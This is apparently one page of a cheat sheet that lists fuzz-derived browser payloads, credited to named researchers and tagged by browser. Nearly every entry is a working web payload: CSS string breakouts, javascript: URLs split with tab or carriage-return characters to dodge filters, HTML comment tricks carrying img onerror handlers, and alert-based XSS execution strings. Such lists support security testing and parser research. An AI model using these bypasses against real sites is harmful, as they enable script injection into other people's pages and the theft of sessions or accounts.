Cheat Sheet
Generated payloads from fuzz test results. Filter by type, category, or browser.
Found 153 vectors with results
<div style="font-family:'x
;color:red;';">test</div>Source: Break out of CSS strings
Author: hackvertor
HTMLCSS ParsingChromeFirefoxSafari
<div style="font-family:'x0x0C;color:red;';">test</div>Source: Break out of CSS strings
Author: hackvertor
HTMLCSS ParsingChromeFirefoxSafari
<div style="font-family:'x0x0D;color:red;';">test</div>Source: Break out of CSS strings
Author: hackvertor
HTMLCSS ParsingChromeFirefoxSafari
<div style="font-family:'x';color:red;';">test</div>Source: Break out of CSS strings
Author: hackvertor
HTMLCSS ParsingChromeFirefoxSafari
const c = String.fromCodePoint(i)0x0D
const c_lower = c.toLowerCase()0x0D
if (c_lower.length != c.length){0x0D
alert(i)0x0D
}Author: JorianWoltjer
JSJavaScript SyntaxChrome
<a id="0" href="j0x09avas0x09crip0x09t:window">craft-me</a>XSSURL HandlingChromeFirefoxSafari
<a id="0" href="j
avas
crip
t:window">craft-me</a>XSSURL HandlingChromeFirefoxSafari
<a id="0" href="j0x0Davas0x0Dcrip0x0Dt:window">craft-me</a>XSSURL HandlingChromeFirefoxSafari
<!----!><img/src/onerror=alert(1)>Source: HTML comment before greater than
Author: hackvertor
HTMLHTML ParsingChromeFirefoxSafari
<!-----><img/src/onerror=alert(1)>Source: HTML comment before greater than
Author: hackvertor
HTMLHTML ParsingChromeFirefoxSafari
<!---->><img/src/onerror=alert(1)>Source: HTML comment before greater than
Author: hackvertor
HTMLHTML ParsingChromeFirefoxSafari
alert(10)
sdfasdfasfasfdJSXSS ExecutionChromeSafariFirefox
alert(13)0x0D0x0DsdfasdfasfasfdJSXSS ExecutionChromeSafariFirefox
alert(38)&&sdfasdfasfasfdJSXSS ExecutionChromeSafariFirefox
alert(42)**sdfasdfasfasfdJSXSS ExecutionChromeSafariFirefox
alert(47)//sdfasdfasfasfdJSXSS ExecutionChromeSafariFirefox
Page 8 of 8
